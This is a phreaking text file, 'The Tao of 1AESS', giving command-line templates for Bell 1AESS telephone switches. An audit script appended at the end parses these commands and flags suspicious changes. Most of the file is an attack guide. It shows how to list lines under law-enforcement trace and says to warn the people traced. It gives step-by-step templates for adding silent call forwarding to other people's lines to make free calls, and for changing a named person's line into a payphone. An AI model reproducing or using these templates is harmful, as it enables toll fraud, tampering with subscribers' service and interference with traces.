-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=    The Tao of 1AESS     =-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=    DeadKat&Disorder     =-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Special thanks to Gatsby and Mark Tabas

Introduction
-=-=-=-=-=-=

The Bell System's first trial of electronic switching took place in
Morris, Illinois, in 1960. The Morris trial culminated a 6-year
development and proved the viability of the stored-program control
concept. The first application of electronic local switching in the Bell
System occurred in May 1965 with the cutover of the first 1ESS switch in
Succasunna, New Jersey.

The 1ESS switching system was designed for use in areas where large
numbers of lines and lines with heavy traffic (primarily business
customers) are served. The system has generally been used in areas
serving between 10,000 and 65,000 lines and has been the primary
replacement system for urban step-by-step and panel systems. The ease and
flexibility of adding new services made 1ESS switching equipment a natural
replacement vehicle in city applications where the demand for new,
sophisticated business and residence services is high.

In 1976, the first electronic toll switching system to operate a digital
time-division switching network under stored-program control, the 4ESS
system, was placed in service. It used a new control, the 1A processor,
for the first time to gain a call carrying capacity in excess of 550,000
busy-hour calls. The 1A processor was also designed for local switching
application. It doubled the call-carrying capacity of the 1ESS switching
system and was introduced in 1976 in the first 1AESS switch. The network
capacity of 1ESS switching equipment was also doubled to allow the 1AESS
switch to serve 130,000 lines.

In addition to local telephone service, the 1AESS switches offer a variety
of special services. Custom Local Area Switching Services (CLASS) are
available as well as Custom Calling Services. Business customers may
select offerings such as centrex, ESS-ACS, Enhanced Private Switched
Communications Service, or electronic tandem switching.
Although more modern switches like 5ESS and DMS 200 have been developed,
it is estimated that some 50 percent of all switches are still 1AESS.

Commands
-=-=-=-=

The 1AESS uses a command line interface for all commands. The commands
are divided into three fields: action, identification, and data. The
fields are always separated by a colon. Every command is terminated by
either a period for verification commands or a 'ballbat' (!) for change
commands. The control-d is used to execute the command instead of a
return. The underscore is used as a backspace. Commands are always typed
in 'all caps'.

The action field is the first field of the command and is ended by a
colon. The identification field is ended by the second colon. The
identification field has one or two subfields which are separated by a
semicolon. Semicolons are not used elsewhere in the command. The data
field consists of keyword units and is the remaining portion of the
command.

Basic Machine Commands
-=-=-=-=-=-=-=-=-=-=-=

These commands provide useful information from the system. The WHO-RV-
command will tell you what CO it is and what version of the OS is
installed. If your output is scrolling off the screen, press space to end
scrolling. The V-STOP- command will clear the buffer.

WHO-RV-.        System information.
SPACE           Stops output from scrolling.
V-STOP-.        Free buffer of remaining LENS/INFO.

Channel Commands
-=-=-=-=-=-=-=-=

Channel commands are used to redirect input and output. If a switch won't
respond to a command, use the OP:CHAN command to check on the current
channel. If your channel is not responding, use the MON:CHAN command to
switch output and control to your terminal (the remote). RC commands
cannot be performed without the ALW command. You can check the status of
the RC with the RCCENSUS command.

OP:CHAN:MON!                    Shows all channels which are being monitored.
MON:CHAN SC1;CHAN LOC!          Redirect output to remote screen.
STOP: MON;CHAN SC1;CHAN LOC!    Redirect output to local screen.
                                (This command needs to be done after you
                                are finished)
OP:RCCENSUS!                    To see recent change status.

Tracing Commands
-=-=-=-=-=-=-=-=

CI-LIST- will give you a list of all numbers which are being traced
externally. It will not show you lines which are being traced only at
this switch.

CI-LIST-.       Traced line list.

Check Features on Line
-=-=-=-=-=-=-=-=-=-=-=

The VF command is used to check the current settings on a line. The DN
XXXXXXX specifies the phone number of the line you wish to check. Replace
XXXXXXX with the seven digit phone number of the line you are checking.

VF:DNSVY:FEATRS,DN XXXXXXX,1,PIC!       Check features of a line.
VF:DNSVY:DN XXXXXXX,1,LASFTRS!          Display last Features

Call Features

CWT- Call Waiting
CFB- Call Forward Busy - Busy=VM
CFV- Call Forwarding Variable
CFD- Call Forward Don't answer
TWC- Three Way Calling
TTC- Touch Tone
RCY- Ring Cycle
SC1- Speed Calling 1
SC2- Speed Calling 2
UNA- No Long Distance
PXX- Block all LD service (guess)
MWI- Message Waiting Indicator
CHD- centrex(unremarkable)
CPU- centrex(unremarkable)
CLI- Calling Line Identification (CID)
ACB- Automatic Call Back Feature (?)
BLN- Special Toll Billing
MDN
NSQ
FRE- Free Calling
SEQ

The standard output of a command appears below. The 'DN 348 2141'
specifies the number you are checking. The calling features will be
listed on the second line by their three letter acronyms. This line has
call waiting (CWT), a trace (TRC), and touch tone dialing (TTC).

M 53 TR75 2 DN 348 2141 00000003
CWT TRC TTC

Searching For Free Lines
-=-=-=-=-=-=-=-=-=-=-=-=

The VFY command can be used to check if a line is in use. The output will
list the LEN (Line Equipment Number) for the line and its call features in
octal. If the LEN is all zeros, then that number has not been assigned.
Replace XXXXXXX with the number you wish to check. You must prefix the
phone number with 30. You can also check for unused LEN's using the VFY
command.
Use the space bar to stop scrolling and the V-STOP command to cancel when
looking up free LEN's.

VFY-DN-30XXXXXXX.       Search for free lines.
VFY-LEN-4100000000.     List all free LENs.
VFY-TNN-XXXXXXXX.       To get information on trunk.

The output for the VFY-DN command will appear like the one below. Notice
that this number has been assigned a LEN so it is in use.

M 06 TR01 796 9146 0 0 0 0 LEN 01 025 000 001 000 000 000 000 000 4 000 000 000 000 000 000 000 000 0 0 0 0 0 0 0 0 0

Searching for a Particular Feature on a Line (trace)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

All line information is stored in the switch for its coverage area. The
switch is like a huge database in this sense. You can do global searches
on the switch for any feature. One especially interesting feature to
search for is traced numbers. Traced numbers listed this way are
INTERNALLY traced as opposed to globally traced numbers shown with the
CI-LIST- command. Global and internal trace lists are always very
different. And remember, be a good samaritan and call the person being
traced and let them know! ;-)

VF:DNSVY:FEATRS,EXMATCH TRACE!  Pull all numbers IN switch area with trace
                                on it (takes a sec).

You can exmatch for any LASS feature by replacing the keyword TRACE with
any call feature like call forwarding (CFB) and speed calling (SC1).

To See What Numbers Are on a Speed Calling List
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Another nice use for the VFY command is to see what is on a line's speed
calling list. Replace XXXXXXX with the target phone number. One devious
use is to look at the CO's speed call list to find other internal telco
numbers.

VFY-LIST-09XXXXXXX020000

09=mask
02=single list (one digit speed calling)
20=double list (two digit speed calling)
28=   "     "
36=   "     "
44=   "     "

To Build a Line
-=-=-=-=-=-=-=-

The recent change command (RC) is used to create and modify lines.
Because RC commands are usually very long and complex, they are typed on
multiple lines to simplify them.
Each subfield of the data section of the command is typed on a separate
line ended by a backslash (\) followed by pressing ctrl-d. To create a
line, you specify LINE in the identification field. Before a line can be
created, you must first locate an unused number by using the VFY-DN
command explained above. Once a free number has been found, you use the
VFY-LEN to find an available LEN.

To build a new line, follow these steps: First, find spare LEN
(VFY-LEN-4100000000.). Next find free line. Now type in the RC commands
using the following commands as a template:

RC:LINE:\               (create a line)
ORD 1\                  (execute the command immediately)
TN XXXXXXX\             (telephone number)
LEN XXXXXXXX\           (len found from above)
LCC 1FR\                (line class code 1fr)
CFV\                    (call forward)
XXX 288\                (type XXX, space, then the three digit PIC)
                        (ld carrier - 222 - MCI
                                      288 - AT&T
                                      333 - Sprint, etc.)
!                       (BEWM, don't forget the ctrl-d!!)

(Look for RCXX blah blah ACPT blah - This means the RECENT CHANGE has
taken effect)

Creating Call Forwarding Numbers
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

The call forwarding feature is the most important feature for hackers. By
creating a line or modifying an existing line with call forwarding, you
can then use it to make free phone calls. You set the line to call
forward/no ring and then give it the call forwarded number. This will
allow you to call the modified line and be instantly forwarded to your
pre-chosen destination.

First create a line using RC:LINE:, then modify the line using the
following commands as a template.

RC:CFV:\                (add call forwarding to a line)
ORD 1\                  (execute the command immediately)
BASE XXXXXXX\           (base number you are changing)
TO XXXXXXX\             (local - XXXXXXX : ld - XXXXXXXXXX )
PFX\                    (set prefix to 1 if ld)
!                       (BEWM)

To Change Call Forward Number
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

It is safer to modify an existing call forward than to create a new line
solely for this purpose. You can use the VFY command and EXMATCH for CFB
to find lines with call forwarding.
Before you can change the call forwarding 'TO' number you must delete the
old one. Remove call forward number using CFV:OUT with the template
below.

RC:CFV;OUT:\            (remove call forward number)
ORD 1\                  (execute command immediately)
BASE XXXXXXX\           (number to remove it from)
!                       (Yeeee-Hahhhahah)

Make Call Forward Not Ring
-=-=-=-=-=-=-=-=-=-=-=-=-=

The only drawback to call forwarding off someone's line is that if it
rings they might answer. To get around this, you add the call-forward
no-ring option (ICFRR) using the following as a template.

RC:LINE;CHG:\           (recent change line to be specified)
ORD 1\                  (execute command immediately)
TN XXXXXXX\             (number you wanna fuck with)
ICFRR\                  (this takes the ring off)
!                       (Go!)

Adding a feature to a line
-=-=-=-=-=-=-=-=-=-=-=-=-=

The RC:LINE;CHG: can also be used to add any other call feature. Use the
same template but change the feature.

RC:LINE;CHG:\           (this is used for changing features)
ORD 1\                  (order number)
TN XXXXXXX\             (telephone number you are fucking with)
TWC\                    (replace this with any feature you wish)
!                       (Fire!)

Removing a Feature
-=-=-=-=-=-=-=-=-=

Use the NO delimiter to remove a feature from a line.

RC:LINE;CHG:\           (change a feature)
ORD 1\                  (effective immediately)
TN XXXXXXX\             (telephone number)
CFV NO\                 (feature followed by NO)
!

Change Phone number into payphone
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

You've read about it in the Hacker Crackdown, now you too can be 31337 and
change Gail Thackeray's phone into a payphone. In fact you can change the
line class code (LCC) to anything you want. To display the LCC of a line
use the following and replace the XXXXXXX with the line you wish to view.

VF:DNSVY:LCC,DN XXXXXXX,1,PIC!
                        (display line class code)

DTF = Payphone
1FR = Flat Rate
1MR = Measured Rate
1PC = One Pay Phone
CDF = DTF Coin
PBX = Private Branch Exchange
CFD = Coinless(ANI7) Charge-a-call
INW = InWATS (800!@#)
OWT = OutWATS
PBM = O HO/MO MSG REG (NO ANI)
PMB = LTG = 1 HO/MO (Regular ANI6)

(ani6 and ani7 - only good for DMS)

To change the line into a payphone use the RC:LINE;CHG command and modify
the LCC like the example below.

RC:LINE;CHG:\           (this is used for changing features)
ORD 1\                  (order number)
TN XXXXXXX\             (telephone number you are fucking with)
LCC DTF\                (line class code you are changing to)
!                       (Make it so.)
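
Added example, not part of the original file: a Python sketch that parses commands using the field rules from the Commands section and flags the recent change (RC) forms shown above that alter forwarding or line class, the way an auditor reviewing a command log would. The log format, the 555 numbers, the function names and the finding strings are assumptions made for illustration.

```python
import re

TERMINATORS = {".": "verify", "!": "change"}

def parse_command(raw):
    """Split one command into the fields the Commands section describes."""
    text = raw.strip()
    kind = TERMINATORS.get(text[-1:])
    if kind is None:
        raise ValueError("missing '.' or '!' terminator")
    parts = text[:-1].split(":", 2)          # action : identification : data
    action = parts[0].strip()
    ident = [s.strip() for s in parts[1].split(";")] if len(parts) > 1 else []
    data = parts[2] if len(parts) > 2 else ""
    # Data units end with a backslash (multi-line RC form) or a comma (one-line form).
    units = [u.strip() for u in re.split(r"[\\,]", data) if u.strip()]
    return {"kind": kind, "action": action, "ident": ident, "units": units}

def audit(cmd):
    """Reasons (hypothetical wording) an RC command deserves review; [] if none."""
    if cmd["action"] != "RC" or cmd["kind"] != "change":
        return []
    reasons = []
    keywords = {u.split()[0] for u in cmd["units"]}
    if cmd["ident"][:1] == ["CFV"]:
        reasons.append("call forwarding " + ("removed" if "OUT" in cmd["ident"] else "set"))
    if "ICFRR" in keywords:
        reasons.append("forwarding without ring enabled")
    if "LCC" in keywords and cmd["ident"] == ["LINE", "CHG"]:
        reasons.append("line class code changed")
    return reasons

# Constructed log entries; the 555 numbers are placeholders, not real lines.
SAMPLE_LOG = [
    "VF:DNSVY:FEATRS,DN 5550100,1,PIC!",
    "RC:CFV:\\\nORD 1\\\nBASE 5550100\\\nTO 5550199\\\n!",
    "RC:LINE;CHG:\\\nORD 1\\\nTN 5550100\\\nICFRR\\\n!",
    "RC:LINE;CHG:\\\nORD 1\\\nTN 5550100\\\nLCC DTF\\\n!",
    "RC:CFV;OUT:\\\nORD 1\\\nBASE 5550100\\\n!",
]

def review(log):
    """Pair each flagged entry's first line with its findings."""
    pairs = [(e.splitlines()[0], audit(parse_command(e))) for e in log]
    return [(first, reasons) for first, reasons in pairs if reasons]

if __name__ == "__main__":
    for first_line, reasons in review(SAMPLE_LOG):
        print(first_line, "->", "; ".join(reasons))
```

A forwarding change followed by ICFRR on the same number is the combination the text describes, so findings grouped by telephone number are the ones to look at first.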